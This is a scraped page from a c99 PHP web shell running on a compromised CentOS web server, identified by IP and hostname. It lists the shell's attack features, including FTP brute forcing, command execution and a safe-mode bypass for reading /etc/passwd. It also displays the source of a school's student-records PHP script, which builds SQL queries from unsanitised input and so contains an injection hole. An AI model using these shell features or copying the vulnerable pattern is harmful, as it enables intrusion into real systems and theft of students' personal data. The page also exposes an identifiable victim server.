110.164.51.230 - phpshell

!c99Shell v. 1.0 pre-release build #16!
Software: Apache/2.2.3 (CentOS). PHP/5.1.6 uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44 EDT 2010 i686 uid=48(apache) gid=48(apache) groups=48(apache) Safe-mode: OFF (not secure) /var/www/html/manage/Std_Acc_depart/ drwxr-xr-x Free 52.6 GB of 127.8 GB (41.16%) Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout

!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686

uid=48(apache) gid=48(apache) groups=48(apache)

Safe-mode: OFF (not secure)

/var/www/html/manage/Std_Acc_depart/ drwxr-xr-x
Free 52.6 GB of 127.8 GB (41.16%)
Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout

Viewing file: EditStudent.php (1.89 KB) -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |

<?php
 session_start();
 if (session_is_registered("valid_user")&&session_is_registered("password")&&session_is_registered("Priority"))
 {
	include("../include/FunctionDB.php");
    include("../include/Function.php");
	ConnectDB();        
	$DateBirth = $_POST[mYear]."-".$_POST[mMonth]."-".$_POST[mDate];
    $Date_in  = $_POST[mYear2]."-".$_POST[mMonth2]."-".$_POST[mDate2];;
	$Student_id = $_POST[Student_id];
	$strSQL= "UPDATE   student_tb SET Course_code='$Course_code',Class='$Class',ProvinceId='$ProvinceId',Orderlist='$Orderlist',Student_id='$Student_id',First_name='$First_name',Name='$Name',Lastname='$Lastname',Sex='$Sex',DateBirth='$DateBirth',Religion='$Religion',Address='$Address',Father_name='$Father_name',Mother_name='$Mother_name',Address2='$Address2',Telno='$Telno',Pre_inst='$Pre_inst',";
	$strSQL = $strSQL."Pre_gpa='$Pre_gpa',Select_Method='$Select_Method',Date_in='$Date_in',Institute='$Institute', ";
	$strSQL = $strSQL."Teacher_code='$Teacher_code',Affect_class='$Affect_class',Scholarship_code='$Scholarship_code', ";
	$strSQL = $strSQL."Address_cur='$Address_cur',Coll_in='$Coll_in',Coll_out='$Coll_out',Circle_duty='$Circle_duty', ";
    $strSQL = $strSQL."Circle='$Circle',Succ_Status='$Succ_Status'";
	$strSQL = $strSQL." WHERE code='$code'";
	$result  = mysql_query($strSQL) or die("Update Error $strSQL".mysql_error());
	header("Location:EditStudentList.php");				
        CloseDB();
	}
else
{
    echo"<body bgcolor=\"#CCCCCC\">";
	 echo"<meta http-equiv=\"refresh\" content=\"3;URL=../../login.php\" target=\"mainFrame\">\n";
     echo"<center>";
	  echo"<br><br><br><b><font face=\"Tahoma\" size=\"4\" color=\"#FF0000\">Please Login</font> </b><br>";
      echo"<br><br><font face=\"Tahoma\" size=\"10\" color=\"#000000\"> ERROR 404 PERMISION DENY</font><br>";
	  echo"<br><font face=\"Tahoma\" size=\"4\" color=\"#000000\"> ¤ШідБиБКФ·ёмгЄй§Т№</font>";
	  echo"</center>";
	  echo"</body>";
} 
?>

:: Command execute ::
Enter:	Select:

:: Shadow's tricks :D ::
Useful Commands Warning. Kernel may be alerted using higher levels	Kernel Info:

:: Preddy's tricks :D ::
Php Safe-Mode Bypass (Read Files) File: eg: /etc/passwd	Php Safe-Mode Bypass (List Directories): Dir: eg: /etc/

:: Search ::

:: Upload ::

:: Make Dir ::

:: Make File ::

:: Go Dir ::

:: Go File ::

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0061 ]--